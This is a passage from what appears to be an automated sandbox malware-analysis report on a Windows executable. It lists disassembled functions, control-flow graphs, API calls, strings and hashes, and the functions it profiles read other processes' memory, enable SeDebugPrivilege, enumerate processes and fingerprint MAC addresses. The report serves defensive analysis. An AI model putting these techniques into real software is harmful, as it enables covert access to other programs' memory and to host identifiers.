                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Memory$ProcessQueryReadVirtual$CloseHandle
                                                                • String ID: Game-EC.fne$lib
                                                                • API String ID: 1831247485-2734279690
                                                                • Opcode ID: 495a1c9a12467687f5be73e64ca0e60a0123d6c9ddac438132cb1f9e78911890
                                                                • Instruction ID: 03b46992964d38843ceb33e277ed1cf5a1a069a55218fb361356d1ede2fd581d
                                                                • Opcode Fuzzy Hash: 495a1c9a12467687f5be73e64ca0e60a0123d6c9ddac438132cb1f9e78911890
                                                                • Instruction Fuzzy Hash: D4A249B1A802569BFB00CF98DCC1B99B7B1FF59324F281065E945AF345D378B861CB26
                                                                Function 0041BB94 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 443COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1947 41bb94-41bc11 call 429a5c call 429a56 1952 41bc13-41bc26 call 401143 call 429a5c 1947->1952 1953 41bc28-41bc2e 1947->1953 1952->1953 1955 41bc30-41bc36 call 429a56 1953->1955 1956 41bc39-41bc41 1953->1956 1955->1956 1957 41bc71-41bcab call 404a96 1956->1957 1958 41bc47-41bc60 call 41c12b 1956->1958 1970 41bcb2-41bcd1 call 42bc10 1957->1970 1971 41bcad 1957->1971 1968 41bc62-41bc68 call 429a56 1958->1968 1969 41bc6b-41bc6e 1958->1969 1968->1969 1969->1957 1976 41bcd3-41bcd9 call 429a56 1970->1976 1977 41bcdc-41bcec 1970->1977 1971->1970 1976->1977 1979 41bcf3-41bd38 call 42b310 call 42c3f0 1977->1979 1980 41bcee 1977->1980 1986 41bd6e-41bd83 call 41c35b 1979->1986 1987 41bd3e-41bd5f call 40288d 1979->1987 1980->1979 1992 41bd85-41bd8b call 429a56 1986->1992 1993 41bd8e-41bdcc call 404a96 1986->1993 1994 41bd61-41bd67 call 429a56 1987->1994 1995 41bd6a-41bd6b 1987->1995 1992->1993 2002 41bdd3-41bdf2 call 42bc10 1993->2002 2003 41bdce 1993->2003 1994->1995 1995->1986 2006 41bdf4-41bdfa call 429a56 2002->2006 2007 41bdfd-41be16 call 41c443 2002->2007 2003->2002 2006->2007 2012 41be21-41be29 2007->2012 2013 41be18-41be1e call 429a56 2007->2013 2015 41be60-41be7d OpenProcess 2012->2015 2016 41be2f-41be3f GetCurrentProcess 2012->2016 2013->2012 2020 41be96 2015->2020 2021 41be7f-41be93 call 429a74 2015->2021 2018 41be41-41be55 call 429a74 2016->2018 2019 41be58-41be5b 2016->2019 2018->2019 2022 41be99-41beb7 VirtualQueryEx 2019->2022 2020->2022 2021->2020 2025 41bed0-41bed7 2022->2025 2026 41beb9-41becd call 429a74 2022->2026 2030 41bedd-41beec 2025->2030 2031 41c09c-41c0af CloseHandle 2025->2031 2026->2025 2033 41bef2-41bf01 2030->2033 2034 41bf26 2030->2034 2035 41c0b1-41c0c5 call 429a74 2031->2035 2036 41c0c8-41c0dd call 40106d 2031->2036 2033->2034 2037 41bf07-41bf19 2033->2037 2038 41bf2b-41bf2d 2034->2038 2035->2036 2050 41c0e8-41c0ed 2036->2050 2051 41c0df-41c0e5 call 429a56 2036->2051 2037->2034 2042 41bf1f-41bf24 2037->2042 2044 41bf33-41bfb5 call 401046 * 2 call 42b8f0 2038->2044 2045 41c04c-41c050 2038->2045 2042->2038 2075 41bfc0-41bfd3 2044->2075 2076 41bfb7-41bfb8 call 429a56 2044->2076 2047 41c056 2045->2047 2048 41c05b-41c08c call 401046 2045->2048 2047->2031 2062 41c092 2048->2062 2063 41c097 2048->2063 2056 41c0f8-41c0fd 2050->2056 2057 41c0ef-41c0f5 call 429a56 2050->2057 2051->2050 2064 41c108-41c119 call 429a56 2056->2064 2065 41c0ff-41c105 call 429a56 2056->2065 2057->2056 2062->2031 2063->2022 2073 41c124-41c128 2064->2073 2074 41c11b-41c121 call 429a56 2064->2074 2065->2064 2074->2073 2079 41bfd5 2075->2079 2080 41bfd8-41bfec ReadProcessMemory 2075->2080 2082 41bfbd 2076->2082 2079->2080 2083 41c005-41c00c 2080->2083 2084 41bfee-41c002 call 429a74 2080->2084 2082->2075 2086 41c012-41c018 2083->2086 2087 41c025 2083->2087 2084->2083 2086->2087 2090 41c01e-41c023 2086->2090 2088 41c02a-41c02c 2087->2088 2088->2045 2091 41c032-41c047 call 41c5bd 2088->2091 2090->2088 2091->2045
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 0041BE32
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF,00000000), ref: 0041BE70
                                                                • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 0041BEAA
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041BFDF
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C0A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentHandleMemoryOpenQueryReadVirtual
                                                                • String ID: 00401000
                                                                • API String ID: 1734214874-3810895984
                                                                • Opcode ID: 89b7798e4d126fc2be03ee519c788b394e23d583054547b111b31f2967c17c2e
                                                                • Instruction ID: 7221e9babcb3d1ad18ca84cc77c3eaae3ce004eee12675bafef9ee27e0268a03
                                                                • Opcode Fuzzy Hash: 89b7798e4d126fc2be03ee519c788b394e23d583054547b111b31f2967c17c2e
                                                                • Instruction Fuzzy Hash: CFF14FB1E40319EBDB10DF95ECC2BDEBBB4EB08314F14106AF604B6282D7799954CB69
                                                                Function 00439A44 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2093 439a44-439af2 call 4c9625 * 3 GetCurrentProcess 2100 439af4-439b08 call 4c9631 2093->2100 2101 439b0b-439b19 2093->2101 2100->2101 2103 439b24-439b44 OpenProcessToken 2101->2103 2104 439b1b-439b21 call 4c962b 2101->2104 2105 439b46-439b5a call 4c9631 2103->2105 2106 439b5d-439b78 LookupPrivilegeValueA 2103->2106 2104->2103 2105->2106 2110 439b91-439c16 AdjustTokenPrivileges 2106->2110 2111 439b7a-439b8e call 4c9631 2106->2111 2115 439c18-439c2c call 4c9631 2110->2115 2116 439c2f-439c45 CloseHandle 2110->2116 2111->2110 2115->2116 2119 439c47-439c5b call 4c9631 2116->2119 2120 439c5e-439c6c 2116->2120 2119->2120 2124 439c77-439c9f call 4c962b * 3 2120->2124 2125 439c6e-439c74 call 4c962b 2120->2125 2125->2124
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00439AE5
                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 00439B37
                                                                • LookupPrivilegeValueA.ADVAPI32(004FEE9E,00000000,?), ref: 00439B6B
                                                                • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,0000001C,?,?), ref: 00439C09
                                                                • CloseHandle.KERNEL32(00000000), ref: 00439C38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 3038321057-2896544425
                                                                • Opcode ID: 6c725354dfadcf02d77ebe475d9dc8e379144b8da03ccbd3c0bdee5e5a10e9bf
                                                                • Instruction ID: 13e31d7d8f56efdacd22959798a99f4c5e488393b21dc980407fa0129a1cae7c
                                                                • Opcode Fuzzy Hash: 6c725354dfadcf02d77ebe475d9dc8e379144b8da03ccbd3c0bdee5e5a10e9bf
                                                                • Instruction Fuzzy Hash: 5161F9B4E00318AFDF50DF94DD86BAEBBB4BB0D304F145069E6087B286D3795914CB6A
                                                                Function 00402DBB Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 815COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • inet_addr.WS2_32(00000000), ref: 00402FE7
                                                                • SendARP.IPHLPAPI(00000000,00000000,?,?), ref: 00403201
                                                                Strings
                                                                • Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2, xrefs: 00402E57
                                                                • MACAddress, xrefs: 00402E4B, 00402F1E
                                                                • Select MACAddress From Win32_NetworkAdapter WHERE NetConnectionStatus =2, xrefs: 00402F2A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sendinet_addr
                                                                • String ID: MACAddress$Select MACAddress From Win32_NetworkAdapter WHERE NetConnectionStatus =2$Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2
                                                                • API String ID: 1684710337-4119221060
                                                                • Opcode ID: 8967e641e95b63abcf51c747ba5ab9ffcf1345ed0664bd1507683f337bcd5778
                                                                • Instruction ID: 8cdf8df996095d76e8d081fefd50f81c6dce7c45d1df1d9a4f9be6c8c8d7e727
                                                                • Opcode Fuzzy Hash: 8967e641e95b63abcf51c747ba5ab9ffcf1345ed0664bd1507683f337bcd5778
                                                                • Instruction Fuzzy Hash: 0642B8F1F403556BEB10DF95ECC2B9E77A8AB18715F14003AF605BA3C2E6795E008769
                                                                Function 00403765 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 194COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2439 403765-4037f3 call 429a5c call 403a0c 2444 4037f5-4037fb call 429a56 2439->2444 2445 4037fe-403808 2439->2445 2444->2445 2447 4039a9-403a09 call 429a5c call 42abe0 call 42ac10 call 429a56 2445->2447 2448 40380e-403827 call 40480f 2445->2448 2455 403832-403891 call 40480f call 42b8d0 call 4048f4 2448->2455 2456 403829-40382f call 429a56 2448->2456 2471 403897-4038b8 call 40492c 2455->2471 2472 403949-40394c call 4048bc 2455->2472 2456->2455 2477 403937-40393b 2471->2477 2478 4038be-4038fb call 40480f call 404964 call 4049b2 2471->2478 2476 403951-403964 SysFreeString 2472->2476 2479 403966-40397a call 429a74 2476->2479 2480 40397d-403990 SysFreeString 2476->2480 2477->2471 2481 403941-403944 call 4048bc 2477->2481 2493 403900-403916 SysFreeString 2478->2493 2479->2480 2480->2447 2484 403992-4039a6 call 429a74 2480->2484 2481->2472 2484->2447 2494 403918-40392c call 429a74 2493->2494 2495 40392f-403932 call 4048bc 2493->2495 2494->2495 2495->2477
                                                                APIs
                                                                  • Part of subcall function 00403A0C: CoInitialize.OLE32(00000000), ref: 00403AD9
                                                                  • Part of subcall function 00403A0C: CoInitializeSecurity.COMBASE(00000000,FFFFFFFF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00403B2F
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403909
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403957
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403983
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeString$Initialize$Security
                                                                • String ID: WQL$root\CIMV2
                                                                • API String ID: 3763729824-4205897174
                                                                • Opcode ID: 69f420f91c4b20add40de96408261167a76b045712e561134f1dafe0e0a97296
                                                                • Instruction ID: 7b297cb8266044e9293a2318d1240b3eb2c25215f18588e2f3bb484e66b04af4
                                                                • Opcode Fuzzy Hash: 69f420f91c4b20add40de96408261167a76b045712e561134f1dafe0e0a97296
                                                                • Instruction Fuzzy Hash: 706126B1D00248AFEF01AFD1DC46BEEBBB4EB08314F14507AF6047A291D7B95A54CB69
                                                                Function 0040BFD2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142timeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2499 40bfd2-40c005 call 429a5c 2502 40c00b-40c00f 2499->2502 2503 40c01c 2499->2503 2502->2503 2504 40c015-40c01a 2502->2504 2505 40c021-40c023 2503->2505 2504->2505 2506 40c043-40c047 2505->2506 2507 40c029-40c03e 2505->2507 2508 40c059-40c05d 2506->2508 2509 40c04d-40c054 2506->2509 2510 40c096-40c0e6 call 401046 CreateWaitableTimerA 2507->2510 2511 40c063-40c06a 2508->2511 2512 40c06f-40c073 2508->2512 2509->2510 2518 40c0e8-40c0fc call 429a74 2510->2518 2519 40c0ff-40c12c SetWaitableTimer 2510->2519 2511->2510 2514 40c085-40c089 2512->2514 2515 40c079-40c080 2512->2515 2514->2510 2517 40c08f 2514->2517 2515->2510 2517->2510 2518->2519 2521 40c145-40c16d MsgWaitForMultipleObjects 2519->2521 2522 40c12e-40c142 call 429a74 2519->2522 2523 40c186-40c18d 2521->2523 2524 40c16f-40c183 call 429a74 2521->2524 2522->2521 2529 40c193-40c1a5 call 42c320 2523->2529 2530 40c1a7-40c1ba CloseHandle 2523->2530 2524->2523 2529->2521 2533 40c1d3-40c1ee call 429a56 2530->2533 2534 40c1bc-40c1d0 call 429a74 2530->2534 2534->2533
                                                                APIs
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0040C0D9
                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,000003E8,00000000,00000001,00000000), ref: 0040C11F
                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,FFFFFFFF,000000FF), ref: 0040C160
                                                                • CloseHandle.KERNEL32(00000000,?,000003E8,00000000,00000001,00000000), ref: 0040C1AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWait
                                                                • String ID: `
                                                                • API String ID: 1829838203-1850852036
                                                                • Opcode ID: 3a36da0c8c8cad819d9ae36d91f20f05f6bdeed0f33cd957c9cc419bddac5e05
                                                                • Instruction ID: 6156cb3b7d6a09a05b960bd2ef3d40442e85c93f57321a3f60ab6ff2be6a5970
                                                                • Opcode Fuzzy Hash: 3a36da0c8c8cad819d9ae36d91f20f05f6bdeed0f33cd957c9cc419bddac5e05
                                                                • Instruction Fuzzy Hash: E1515170E44309EBDB10DF91E9867AEBB74EB05710F108166F5053A2C1D77A8A64CFAB
                                                                Function 0040BB11 Relevance: 7.9, APIs: 5, Instructions: 434processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2541 40bb11-40bb87 call 429a5c * 2 CreateToolhelp32Snapshot 2546 40bba0-40bba7 2541->2546 2547 40bb89-40bb9d call 429a74 2541->2547 2549 40bbb7-40bc64 call 429a5c Process32First 2546->2549 2550 40bbad-40bbb2 2546->2550 2547->2546 2557 40bc66-40bc7a call 429a74 2549->2557 2558 40bc7d-40bcfd call 429f70 2549->2558 2552 40bfae-40bfcf call 429a56 * 2 2550->2552 2557->2558 2565 40bd0e-40bd14 2558->2565 2566 40bcff 2558->2566 2568 40bd16 2565->2568 2569 40bd1b-40bd33 call 429a56 2565->2569 2567 40bd01-40bd05 2566->2567 2570 40bd07-40bd0a 2567->2570 2571 40bd0c 2567->2571 2568->2569 2574 40bd36-40bd3a 2569->2574 2570->2567 2571->2565 2575 40bd40-40bd80 call 42a180 2574->2575 2576 40bf78-40bf8b CloseHandle 2574->2576 2582 40bd82 2575->2582 2583 40bd87-40bd96 2575->2583 2577 40bfa4-40bfa9 2576->2577 2578 40bf8d-40bfa1 call 429a74 2576->2578 2577->2552 2578->2577 2582->2583 2585 40bd98 2583->2585 2586 40bd9d-40bdb8 call 42c2c0 2583->2586 2585->2586 2589 40bdc3-40bdc7 2586->2589 2590 40bdba-40bdc0 call 429a56 2586->2590 2592 40be03-40bea1 call 429a5c Process32Next 2589->2592 2593 40bdcd-40bde0 CloseHandle 2589->2593 2590->2589 2600 40bea3-40beb7 call 429a74 2592->2600 2601 40beba-40bf3a call 429f70 2592->2601 2596 40bde2-40bdf6 call 429a74 2593->2596 2597 40bdf9-40bdfe 2593->2597 2596->2597 2597->2552 2600->2601 2607 40bf4b-40bf51 2601->2607 2608 40bf3c 2601->2608 2610 40bf53 2607->2610 2611 40bf58-40bf73 call 429a56 2607->2611 2609 40bf3e-40bf42 2608->2609 2613 40bf44-40bf47 2609->2613 2614 40bf49 2609->2614 2610->2611 2611->2574 2613->2609 2614->2607
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,?,00401377,?), ref: 0040BB7A
                                                                • Process32First.KERNEL32(000000FF,00000000), ref: 0040BC57
                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040BDD3
                                                                • Process32Next.KERNEL32(000000FF,00000000), ref: 0040BE94
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,00401377,?), ref: 0040BF7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1789362936-0
                                                                • Opcode ID: 7bcb87d04fedd2bbb75db658aa9d37da5b5a53274c6ae36ada41991fc3191ba1
                                                                • Instruction ID: 90e5e60346342f46725f9dd91af34a12fa010703bb6910536cc1d05f594bb0b6
                                                                • Opcode Fuzzy Hash: 7bcb87d04fedd2bbb75db658aa9d37da5b5a53274c6ae36ada41991fc3191ba1
                                                                • Instruction Fuzzy Hash: EAE13AF1A402529BFB00CF58ECC1B99B7B1EF59324F291075E506AB381D378B960DB66
                                                                Function 00404C42 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: OPTIONS$User-Agent:$https://
                                                                • API String ID: 2038078732-700722832
                                                                • Opcode ID: a781780b6f3d3943723ff75b13416bc4d359fc5dee8e843190fff0d10933da71
                                                                • Instruction ID: 12fbd2a3691f7324e0bfd8f6be448399e0d44fa5f7b7346d465fb6d1ad47d522
                                                                • Opcode Fuzzy Hash: a781780b6f3d3943723ff75b13416bc4d359fc5dee8e843190fff0d10933da71
                                                                • Instruction Fuzzy Hash: 9D9152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                Function 00404C4C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 282networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
